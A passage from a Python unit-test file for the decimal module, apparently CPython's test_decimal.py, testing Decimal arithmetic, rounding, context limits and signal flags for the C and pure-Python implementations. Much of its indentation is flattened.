self.assertEqual(Decimal("10") // 7, 1)
# fma
self.assertEqual(Decimal("1.2").fma(Decimal("0.01"), 1), 1)
self.assertIs(Decimal("NaN").fma(7, 1).is_nan(), True)
# three arg power
self.assertEqual(pow(Decimal(10), 2, 7), 2)
# exp
self.assertEqual(Decimal("1.01").exp(), 3)
# is_normal
self.assertIs(Decimal("0.01").is_normal(), False)
# is_subnormal
self.assertIs(Decimal("0.01").is_subnormal(), True)
# ln
self.assertEqual(Decimal("20").ln(), 3)
# log10
self.assertEqual(Decimal("20").log10(), 1)
# logb
self.assertEqual(Decimal("580").logb(), 2)
# logical_invert
self.assertEqual(Decimal("10").logical_invert(), 1)
# minus
self.assertEqual(-Decimal("-10"), 10)
# multiply
self.assertEqual(Decimal("2") * 4, 8)
# next_minus
self.assertEqual(Decimal("10").next_minus(), 9)
# next_plus
self.assertEqual(Decimal("10").next_plus(), Decimal('2E+1'))
# normalize
self.assertEqual(Decimal("-10").normalize(), Decimal('-1E+1'))
# number_class
self.assertEqual(Decimal("10").number_class(), '+Normal')
# plus
self.assertEqual(+Decimal("-1"), -1)
# remainder
self.assertEqual(Decimal("10") % 7, 3)
# subtract
self.assertEqual(Decimal("10") - 7, 3)
# to_integral_exact
self.assertEqual(Decimal("1.12345").to_integral_exact(), 1)
# Boolean functions
self.assertTrue(Decimal("1").is_canonical())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("snan").is_snan())
self.assertTrue(Decimal("-1").is_signed())
self.assertTrue(Decimal("0").is_zero())
self.assertTrue(Decimal("0").is_zero())
# Copy
with localcontext() as c:
c.prec = 10000
x = 1228 ** 1523
y = -Decimal(x)
z = y.copy_abs()
self.assertEqual(z, x)
z = y.copy_negate()
self.assertEqual(z, x)
z = y.copy_sign(Decimal(1))
self.assertEqual(z, x)
def test_divmod(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
with localcontext() as c:
q, r = divmod(Decimal("10912837129"), 1001)
self.assertEqual(q, Decimal('10901935'))
self.assertEqual(r, Decimal('194'))
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
c.clear_flags()
q, r = divmod(Decimal("inf"), Decimal("inf"))
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal("inf"), 101)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal(0), 0)
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.traps[DivisionByZero] = False
c.clear_flags()
q, r = divmod(Decimal(11), 0)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation] and
c.flags[DivisionByZero])
def test_power(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
Overflow = self.decimal.Overflow
Rounded = self.decimal.Rounded
with localcontext() as c:
c.prec = 3
c.clear_flags()
self.assertEqual(Decimal("1.0") ** 100, Decimal('1.00'))
self.assertTrue(c.flags[Rounded])
c.prec = 1
c.Emax = 1
c.Emin = -1
c.clear_flags()
c.traps[Overflow] = False
self.assertEqual(Decimal(10000) ** Decimal("0.5"), Decimal('inf'))
self.assertTrue(c.flags[Overflow])
def test_quantize(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
c.traps[InvalidOperation] = False
x = Decimal(99).quantize(Decimal("1e1"))
self.assertTrue(x.is_nan())
def test_radix(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
self.assertEqual(Decimal("1").radix(), 10)
self.assertEqual(c.radix(), 10)
def test_rop(self):
Decimal = self.decimal.Decimal
for attr in ('__radd__', '__rsub__', '__rmul__', '__rtruediv__',
'__rdivmod__', '__rmod__', '__rfloordiv__', '__rpow__'):
self.assertIs(getattr(Decimal("1"), attr)("xyz"), NotImplemented)
def test_round(self):
# Python3 behavior: round() returns Decimal
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 28
self.assertEqual(str(Decimal("9.99").__round__()), "10")
self.assertEqual(str(Decimal("9.99e-5").__round__()), "0")
self.assertEqual(str(Decimal("1.23456789").__round__(5)), "1.23457")
self.assertEqual(str(Decimal("1.2345").__round__(10)), "1.2345000000")
self.assertEqual(str(Decimal("1.2345").__round__(-10)), "0E+10")
self.assertRaises(TypeError, Decimal("1.23").__round__, "5")
self.assertRaises(TypeError, Decimal("1.23").__round__, 5, 8)
def test_create_decimal(self):
c = self.decimal.Context()
self.assertRaises(ValueError, c.create_decimal, ["%"])
def test_int(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 9999
x = Decimal(1221**1271) / 10**3923
self.assertEqual(int(x), 1)
self.assertEqual(x.to_integral(), 2)
def test_copy(self):
Context = self.decimal.Context
c = Context()
c.prec = 10000
x = -(1172 ** 1712)
y = c.copy_abs(x)
self.assertEqual(y, -x)
y = c.copy_negate(x)
self.assertEqual(y, -x)
y = c.copy_sign(x, 1)
self.assertEqual(y, -x)
class CCoverage(Coverage):
    # Run the Coverage tests against the C accelerator.
    decimal = C
class PyCoverage(Coverage):
    # Run the Coverage tests against the pure-Python module.
    decimal = P
class PyFunctionality(unittest.TestCase):
    """Extra functionality in decimal.py"""

    def test_py_alternate_formatting(self):
        """Check '#' alternate-form formatting (issue 7094)."""
        # triples giving a format, a Decimal, and the expected result
        Decimal = P.Decimal
        # NOTE: the original bound `localcontext = P.localcontext` here but
        # never used it; the dead local has been removed.

        test_values = [
            # Issue 7094: Alternate formatting (specified by #)
            ('.0e', '1.0', '1e+0'),
            ('#.0e', '1.0', '1.e+0'),
            ('.0f', '1.0', '1'),
            ('#.0f', '1.0', '1.'),
            ('g', '1.1', '1.1'),
            ('#g', '1.1', '1.1'),
            ('.0g', '1', '1'),
            ('#.0g', '1', '1.'),
            ('.0%', '1.0', '100%'),
            ('#.0%', '1.0', '100.%'),
        ]
        for fmt, d, result in test_values:
            self.assertEqual(format(Decimal(d), fmt), result)
class PyWhitebox(unittest.TestCase):
    """White box testing for decimal.py"""

    def test_py_exact_power(self):
        # Rarely exercised lines in _power_exact.
        Decimal = P.Decimal
        localcontext = P.localcontext

        with localcontext() as c:
            c.prec = 8
            x = Decimal(2**16) ** Decimal("-0.5")
            self.assertEqual(x, Decimal('0.00390625'))

            x = Decimal(2**16) ** Decimal("-0.6")
            self.assertEqual(x, Decimal('0.0012885819'))

            x = Decimal("256e7") ** Decimal("-0.5")

            x = Decimal(152587890625) ** Decimal('-0.0625')
            self.assertEqual(x, Decimal("0.2"))

            x = Decimal("152587890625e7") ** Decimal('-0.0625')

            x = Decimal(5**2659) ** Decimal('-0.0625')

            c.prec = 1
            x = Decimal("152587890625") ** Decimal('-0.5')
            c.prec = 201
            x = Decimal(2**578) ** Decimal("-0.5")

    def test_py_immutability_operations(self):
        # Do operations and check that it didn't change internal objects.
        Decimal = P.Decimal
        DefaultContext = P.DefaultContext
        setcontext = P.setcontext

        c = DefaultContext.copy()
        c.traps = dict((s, 0) for s in OrderedSignals[P])
        setcontext(c)

        d1 = Decimal('-25e55')
        b1 = Decimal('-25e55')
        d2 = Decimal('33e+33')
        b2 = Decimal('33e+33')

        def checkSameDec(operation, useOther=False):
            # Run the operation via eval, then verify that the private
            # _sign/_int/_exp fields of the operand(s) are untouched.
            if useOther:
                eval("d1." + operation + "(d2)")
                self.assertEqual(d1._sign, b1._sign)
                self.assertEqual(d1._int, b1._int)
                self.assertEqual(d1._exp, b1._exp)
                self.assertEqual(d2._sign, b2._sign)
                self.assertEqual(d2._int, b2._int)
                self.assertEqual(d2._exp, b2._exp)
            else:
                eval("d1." + operation + "()")
                self.assertEqual(d1._sign, b1._sign)
                self.assertEqual(d1._int, b1._int)
                self.assertEqual(d1._exp, b1._exp)

        Decimal(d1)
        self.assertEqual(d1._sign, b1._sign)
        self.assertEqual(d1._int, b1._int)
        self.assertEqual(d1._exp, b1._exp)

        checkSameDec("__abs__")
        checkSameDec("__add__", True)
        checkSameDec("__divmod__", True)
        checkSameDec("__eq__", True)
        checkSameDec("__ne__", True)
        checkSameDec("__le__", True)
        checkSameDec("__lt__", True)
        checkSameDec("__ge__", True)
        checkSameDec("__gt__", True)
        checkSameDec("__float__")
        checkSameDec("__floordiv__", True)
        checkSameDec("__hash__")
        checkSameDec("__int__")
        checkSameDec("__trunc__")
        checkSameDec("__mod__", True)
        checkSameDec("__mul__", True)
        checkSameDec("__neg__")
        checkSameDec("__bool__")
        checkSameDec("__pos__")
        checkSameDec("__pow__", True)
        checkSameDec("__radd__", True)
        checkSameDec("__rdivmod__", True)
        checkSameDec("__repr__")
        checkSameDec("__rfloordiv__", True)
        checkSameDec("__rmod__", True)
        checkSameDec("__rmul__", True)
        checkSameDec("__rpow__", True)
        checkSameDec("__rsub__", True)
        checkSameDec("__str__")
        checkSameDec("__sub__", True)
        checkSameDec("__truediv__", True)
        checkSameDec("adjusted")
        checkSameDec("as_tuple")
        checkSameDec("compare", True)
        checkSameDec("max", True)
        checkSameDec("min", True)
        checkSameDec("normalize")
        checkSameDec("quantize", True)
        checkSameDec("remainder_near", True)
        checkSameDec("same_quantum", True)
        checkSameDec("sqrt")
        checkSameDec("to_eng_string")
        checkSameDec("to_integral")

    def test_py_decimal_id(self):
        # Constructing from a Decimal must produce a distinct object.
        Decimal = P.Decimal

        d = Decimal(45)
        e = Decimal(d)
        self.assertEqual(str(e), '45')
        self.assertNotEqual(id(d), id(e))

    def test_py_rescale(self):
        # Coverage
        Decimal = P.Decimal
        localcontext = P.localcontext

        with localcontext() as c:
            x = Decimal("NaN")._rescale(3, ROUND_UP)
            self.assertTrue(x.is_nan())

    def test_py__round(self):
        # Coverage
        Decimal = P.Decimal

        self.assertRaises(ValueError, Decimal("3.1234")._round, 0, ROUND_UP)
class CFunctionality(unittest.TestCase):
    """Extra functionality in _decimal"""

    @requires_extra_functionality
    def test_c_ieee_context(self):
        # issue 8786: Add support for IEEE 754 contexts to decimal module.
        IEEEContext = C.IEEEContext
        DECIMAL32 = C.DECIMAL32
        DECIMAL64 = C.DECIMAL64
        DECIMAL128 = C.DECIMAL128

        def assert_rest(self, context):
            # Common checks shared by all three IEEE interchange formats.
            self.assertEqual(context.clamp, 1)
            assert_signals(self, context, 'traps', [])
            assert_signals(self, context, 'flags', [])

        c = IEEEContext(DECIMAL32)
        self.assertEqual(c.prec, 7)
        self.assertEqual(c.Emax, 96)
        self.assertEqual(c.Emin, -95)
        assert_rest(self, c)

        c = IEEEContext(DECIMAL64)
        self.assertEqual(c.prec, 16)
        self.assertEqual(c.Emax, 384)
        self.assertEqual(c.Emin, -383)
        assert_rest(self, c)

        c = IEEEContext(DECIMAL128)
        self.assertEqual(c.prec, 34)
        self.assertEqual(c.Emax, 6144)
        self.assertEqual(c.Emin, -6143)
        assert_rest(self, c)

        # Invalid values
        self.assertRaises(OverflowError, IEEEContext, 2**63)
        self.assertRaises(ValueError, IEEEContext, -1)
        self.assertRaises(ValueError, IEEEContext, 1024)

    @requires_extra_functionality
    def test_c_context(self):
        Context = C.Context

        c = Context(flags=C.DecClamped, traps=C.DecRounded)
        self.assertEqual(c._flags, C.DecClamped)
        self.assertEqual(c._traps, C.DecRounded)

    @requires_extra_functionality
    def test_constants(self):
        # Condition flags
        cond = (
            C.DecClamped, C.DecConversionSyntax, C.DecDivisionByZero,
            C.DecDivisionImpossible, C.DecDivisionUndefined,
            C.DecFpuError, C.DecInexact, C.DecInvalidContext,
            C.DecInvalidOperation, C.DecMallocError,
            C.DecFloatOperation, C.DecOverflow, C.DecRounded,
            C.DecSubnormal, C.DecUnderflow
        )

        # IEEEContext
        self.assertEqual(C.DECIMAL32, 32)
        self.assertEqual(C.DECIMAL64, 64)
        self.assertEqual(C.DECIMAL128, 128)
        self.assertEqual(C.IEEE_CONTEXT_MAX_BITS, 512)

        # Conditions: each constant is a distinct bit.
        for i, v in enumerate(cond):
            self.assertEqual(v, 1<<i)

        self.assertEqual(C.DecIEEEInvalidOperation,
                         C.DecConversionSyntax|
                         C.DecDivisionImpossible|
                         C.DecDivisionUndefined|
                         C.DecFpuError|
                         C.DecInvalidContext|
                         C.DecInvalidOperation|
                         C.DecMallocError)

        self.assertEqual(C.DecErrors,
                         C.DecIEEEInvalidOperation|
                         C.DecDivisionByZero)

        self.assertEqual(C.DecTraps,
                         C.DecErrors|C.DecOverflow|C.DecUnderflow)
class CWhitebox(unittest.TestCase):
"""Whitebox testing for _decimal"""
def test_bignum(self):
# Not exactly whitebox, but too slow with pydecimal.
Decimal = C.Decimal
localcontext = C.localcontext
b1 = 10**35
b2 = 10**36
with localcontext() as c:
c.prec = 1000000
for i in range(5):
a = random.randrange(b1, b2)
b = random.randrange(1000, 1200)
x = a ** b
y = Decimal(a) ** Decimal(b)
self.assertEqual(x, y)
def test_invalid_construction(self):
self.assertRaises(TypeError, C.Decimal, 9, "xyz")
def test_c_input_restriction(self):
# Too large for _decimal to be converted exactly
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
Context = C.Context
localcontext = C.localcontext
with localcontext(Context()):
self.assertRaises(InvalidOperation, Decimal,
"1e9999999999999999999")
def test_c_context_repr(self):
# This test is _decimal-only because flags are not printed
# in the same order.
DefaultContext = C.DefaultContext
FloatOperation = C.FloatOperation
c = DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[C]:
c.flags[sig] = True
c.traps[sig] = True
c.flags[FloatOperation] = True
c.traps[FloatOperation] = True
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow], " \
"traps=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow])"
self.assertEqual(s, t)
def test_c_context_errors(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
FloatOperation = C.FloatOperation
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# SignalDict: input validation
self.assertRaises(KeyError, c.flags.__setitem__, 801, 0)
self.assertRaises(KeyError, c.traps.__setitem__, 801, 0)
self.assertRaises(ValueError, c.flags.__delitem__, Overflow)
self.assertRaises(ValueError, c.traps.__delitem__, InvalidOperation)
self.assertRaises(TypeError, setattr, c, 'flags', ['x'])
self.assertRaises(TypeError, setattr, c,'traps', ['y'])
self.assertRaises(KeyError, setattr, c, 'flags', {0:1})
self.assertRaises(KeyError, setattr, c, 'traps', {0:1})
# Test assignment from a signal dict with the correct length but
# one invalid key.
d = c.flags.copy()
del d[FloatOperation]
d["XYZ"] = 91283719
self.assertRaises(KeyError, setattr, c, 'flags', d)
self.assertRaises(KeyError, setattr, c, 'traps', d)
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
gt_max_emax = 10**18 if HAVE_CONFIG_64 else 10**9
# prec, Emax, Emin
for attr in ['prec', 'Emax']:
self.assertRaises(ValueError, setattr, c, attr, gt_max_emax)
self.assertRaises(ValueError, setattr, c, 'Emin', -gt_max_emax)
# prec, Emax, Emin in context constructor
self.assertRaises(ValueError, Context, prec=gt_max_emax)
self.assertRaises(ValueError, Context, Emax=gt_max_emax)
self.assertRaises(ValueError, Context, Emin=-gt_max_emax)
# Overflow in conversion
self.assertRaises(OverflowError, Context, prec=int_max+1)
self.assertRaises(OverflowError, Context, Emax=int_max+1)
self.assertRaises(OverflowError, Context, Emin=-int_max-2)
self.assertRaises(OverflowError, Context, clamp=int_max+1)
self.assertRaises(OverflowError, Context, capitals=int_max+1)
# OverflowError, general ValueError
for attr in ('prec', 'Emin', 'Emax', 'capitals', 'clamp'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, attr, int_max)
self.assertRaises(ValueError, setattr, c, attr, -int_max-1)
# OverflowError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(OverflowError, getattr(c, '_unsafe_setprec'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemax'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemin'),
-int_max-2)
# ValueError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'), 0)
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'), -1)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'),
-1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'), 1)
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, attr, 2**32)
self.assertRaises(ValueError, setattr, c, attr, 2**32+1)
# Invalid local context
self.assertRaises(TypeError, exec, 'with localcontext("xyz"): pass',
locals())
self.assertRaises(TypeError, exec,
'with localcontext(context=getcontext()): pass',
locals())
# setcontext
saved_context = getcontext()
self.assertRaises(TypeError, setcontext, "xyz")
setcontext(saved_context)
def test_rounding_strings_interned(self):
self.assertIs(C.ROUND_UP, P.ROUND_UP)
self.assertIs(C.ROUND_DOWN, P.ROUND_DOWN)
self.assertIs(C.ROUND_CEILING, P.ROUND_CEILING)
self.assertIs(C.ROUND_FLOOR, P.ROUND_FLOOR)
self.assertIs(C.ROUND_HALF_UP, P.ROUND_HALF_UP)
self.assertIs(C.ROUND_HALF_DOWN, P.ROUND_HALF_DOWN)
self.assertIs(C.ROUND_HALF_EVEN, P.ROUND_HALF_EVEN)
self.assertIs(C.ROUND_05UP, P.ROUND_05UP)
@requires_extra_functionality
def test_c_context_errors_extra(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
# OverflowError, general ValueError
self.assertRaises(OverflowError, setattr, c, '_allcr', int_max+1)
self.assertRaises(OverflowError, setattr, c, '_allcr', -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, '_allcr', int_max)
self.assertRaises(ValueError, setattr, c, '_allcr', -int_max-1)
# OverflowError, general TypeError
for attr in ('_flags', '_traps'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(TypeError, setattr, c, attr, int_max)
self.assertRaises(TypeError, setattr, c, attr, -int_max-1)
# _allcr
self.assertRaises(ValueError, setattr, c, '_allcr', -1)
self.assertRaises(ValueError, setattr, c, '_allcr', 2)
self.assertRaises(TypeError, setattr, c, '_allcr', [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32)
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32+1)
# _flags, _traps
for attr in ['_flags', '_traps']:
self.assertRaises(TypeError, setattr, c, attr, 999999)
self.assertRaises(TypeError, setattr, c, attr, 'x')
def test_c_valid_context(self):
# These tests are for code coverage in _decimal.
DefaultContext = C.DefaultContext
Clamped = C.Clamped
Underflow = C.Underflow
Inexact = C.Inexact
Rounded = C.Rounded
Subnormal = C.Subnormal
c = DefaultContext.copy()
# Exercise all getters and setters
c.prec = 34
c.rounding = ROUND_HALF_UP
c.Emax = 3000
c.Emin = -3000
c.capitals = 1
c.clamp = 0
self.assertEqual(c.prec, 34)
self.assertEqual(c.rounding, ROUND_HALF_UP)
self.assertEqual(c.Emin, -3000)
self.assertEqual(c.Emax, 3000)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
self.assertEqual(c.Etiny(), -3033)
self.assertEqual(c.Etop(), 2967)
# Exercise all unsafe setters
if C.MAX_PREC == 425000000:
c._unsafe_setprec(999999999)
c._unsafe_setemax(999999999)
c._unsafe_setemin(-999999999)
self.assertEqual(c.prec, 999999999)
self.assertEqual(c.Emax, 999999999)
self.assertEqual(c.Emin, -999999999)
@requires_extra_functionality
def test_c_valid_context_extra(self):
DefaultContext = C.DefaultContext
c = DefaultContext.copy()
self.assertEqual(c._allcr, 1)
c._allcr = 0
self.assertEqual(c._allcr, 0)
def test_c_round(self):
# Restricted input.
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
localcontext = C.localcontext
MAX_EMAX = C.MAX_EMAX
MIN_ETINY = C.MIN_ETINY
int_max = 2**63-1 if C.MAX_PREC > 425000000 else 2**31-1
with localcontext() as c:
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
-int_max-1)
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
int_max)
self.assertRaises(InvalidOperation, Decimal("1").__round__,
int(MAX_EMAX+1))
self.assertRaises(C.InvalidOperation, Decimal("1").__round__,
-int(MIN_ETINY-1))
self.assertRaises(OverflowError, Decimal("1.23").__round__,
-int_max-2)
self.assertRaises(OverflowError, Decimal("1.23").__round__,
int_max+1)
def test_c_format(self):
# Restricted input
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", [], 9)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", 9)
self.assertRaises(TypeError, Decimal(1).__format__, [])
self.assertRaises(ValueError, Decimal(1).__format__, "<>=10.10")
maxsize = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
self.assertRaises(ValueError, Decimal("1.23456789").__format__,
"=%d.1" % maxsize)
def test_c_integral(self):
Decimal = C.Decimal
Inexact = C.Inexact
localcontext = C.localcontext
x = Decimal(10)
self.assertEqual(x.to_integral(), 10)
self.assertRaises(TypeError, x.to_integral, '10')
self.assertRaises(TypeError, x.to_integral, 10, 'x')
self.assertRaises(TypeError, x.to_integral, 10)
self.assertEqual(x.to_integral_value(), 10)
self.assertRaises(TypeError, x.to_integral_value, '10')
self.assertRaises(TypeError, x.to_integral_value, 10, 'x')
self.assertRaises(TypeError, x.to_integral_value, 10)
self.assertEqual(x.to_integral_exact(), 10)
self.assertRaises(TypeError, x.to_integral_exact, '10')
self.assertRaises(TypeError, x.to_integral_exact, 10, 'x')
self.assertRaises(TypeError, x.to_integral_exact, 10)
with localcontext() as c:
x = Decimal("99999999999999999999999999.9").to_integral_value(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
x = Decimal("99999999999999999999999999.9").to_integral_exact(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
c.traps[Inexact] = True
self.assertRaises(Inexact, Decimal("999.9").to_integral_exact, ROUND_UP)
def test_c_funcs(self):
# Invalid arguments
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
getcontext = C.getcontext
localcontext = C.localcontext
self.assertEqual(Decimal('9.99e10').to_eng_string(), '99.9E+9')
self.assertRaises(TypeError, pow, Decimal(1), 2, "3")
self.assertRaises(TypeError, Decimal(9).number_class, "x", "y")
self.assertRaises(TypeError, Decimal(9).same_quantum, 3, "x", "y")
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), []
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), getcontext()
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), 10
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), ROUND_UP, 1000
)
with localcontext() as c:
c.clear_traps()
# Invalid arguments
self.assertRaises(TypeError, c.copy_sign, Decimal(1), "x", "y")
self.assertRaises(TypeError, c.canonical, 200)
self.assertRaises(TypeError, c.is_canonical, 200)
self.assertRaises(TypeError, c.divmod, 9, 8, "x", "y")
self.assertRaises(TypeError, c.same_quantum, 9, 3, "x", "y")
self.assertEqual(str(c.canonical(Decimal(200))), '200')
self.assertEqual(c.radix(), 10)
c.traps[DivisionByZero] = True
self.assertRaises(DivisionByZero, Decimal(9).__divmod__, 0)
self.assertRaises(DivisionByZero, c.divmod, 9, 0)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal(9).__divmod__, 0)
self.assertRaises(InvalidOperation, c.divmod, 9, 0)
self.assertTrue(c.flags[DivisionByZero])
c.traps[InvalidOperation] = True
c.prec = 2
self.assertRaises(InvalidOperation, pow, Decimal(1000), 1, 501)
def test_va_args_exceptions(self):
Decimal = C.Decimal
Context = C.Context
x = Decimal("10001111111")
for attr in ['exp', 'is_normal', 'is_subnormal', 'ln', 'log10',
'logb', 'logical_invert', 'next_minus', 'next_plus',
'normalize', 'number_class', 'sqrt', 'to_eng_string']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
for attr in ['compare', 'compare_signal', 'logical_and',
'logical_or', 'max', 'max_mag', 'min', 'min_mag',
'remainder_near', 'rotate', 'scaleb', 'shift']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
self.assertRaises(TypeError, x.to_integral, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral, [], [])
self.assertRaises(TypeError, x.to_integral_value, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_value, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_value, [], [])
self.assertRaises(TypeError, x.to_integral_exact, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_exact, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_exact, [], [])
self.assertRaises(TypeError, x.fma, 1, 2, context="x")
self.assertRaises(TypeError, x.fma, 1, 2, "x", context=None)
self.assertRaises(TypeError, x.quantize, 1, [], context=None)
self.assertRaises(TypeError, x.quantize, 1, [], rounding=None)
self.assertRaises(TypeError, x.quantize, 1, [], [])
c = Context()
self.assertRaises(TypeError, c.power, 1, 2, mod="x")
self.assertRaises(TypeError, c.power, 1, "x", mod=None)
self.assertRaises(TypeError, c.power, "x", 2, mod=None)
@requires_extra_functionality
def test_c_context_templates(self):
self.assertEqual(
C.BasicContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow|
C.DecUnderflow|C.DecClamped
)
self.assertEqual(
C.DefaultContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow
)
@requires_extra_functionality
def test_c_signal_dict(self):
# SignalDict coverage
Context = C.Context
DefaultContext = C.DefaultContext
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
Overflow = C.Overflow
Subnormal = C.Subnormal
Underflow = C.Underflow
Rounded = C.Rounded
Inexact = C.Inexact
Clamped = C.Clamped
DecClamped = C.DecClamped
DecInvalidOperation = C.DecInvalidOperation
DecIEEEInvalidOperation = C.DecIEEEInvalidOperation
def assertIsExclusivelySet(signal, signal_dict):
for sig in signal_dict:
if sig == signal:
self.assertTrue(signal_dict[sig])
else:
self.assertFalse(signal_dict[sig])
c = DefaultContext.copy()
# Signal dict methods
self.assertTrue(Overflow in c.traps)
c.clear_traps()
for k in c.traps.keys():
c.traps[k] = True
for v in c.traps.values():
self.assertTrue(v)
c.clear_traps()
for k, v in c.traps.items():
self.assertFalse(v)
self.assertFalse(c.flags.get(Overflow))
self.assertIs(c.flags.get("x"), None)
self.assertEqual(c.flags.get("x", "y"), "y")
self.assertRaises(TypeError, c.flags.get, "x", "y", "z")
self.assertEqual(len(c.flags), len(c.traps))
s = sys.getsizeof(c.flags)
s = sys.getsizeof(c.traps)
s = c.flags.__repr__()
# Set flags/traps.
c.clear_flags()
c._flags = DecClamped
self.assertTrue(c.flags[Clamped])
c.clear_traps()
c._traps = DecInvalidOperation
self.assertTrue(c.traps[InvalidOperation])
# Set flags/traps from dictionary.
c.clear_flags()
d = c.flags.copy()
d[DivisionByZero] = True
c.flags = d
assertIsExclusivelySet(DivisionByZero, c.flags)
c.clear_traps()
d = c.traps.copy()
d[Underflow] = True
c.traps = d
assertIsExclusivelySet(Underflow, c.traps)
# Random constructors
IntSignals = {
Clamped: C.DecClamped,
Rounded: C.DecRounded,
Inexact: C.DecInexact,
Subnormal: C.DecSubnormal,
Underflow: C.DecUnderflow,
Overflow: C.DecOverflow,
DivisionByZero: C.DecDivisionByZero,
InvalidOperation: C.DecIEEEInvalidOperation
}
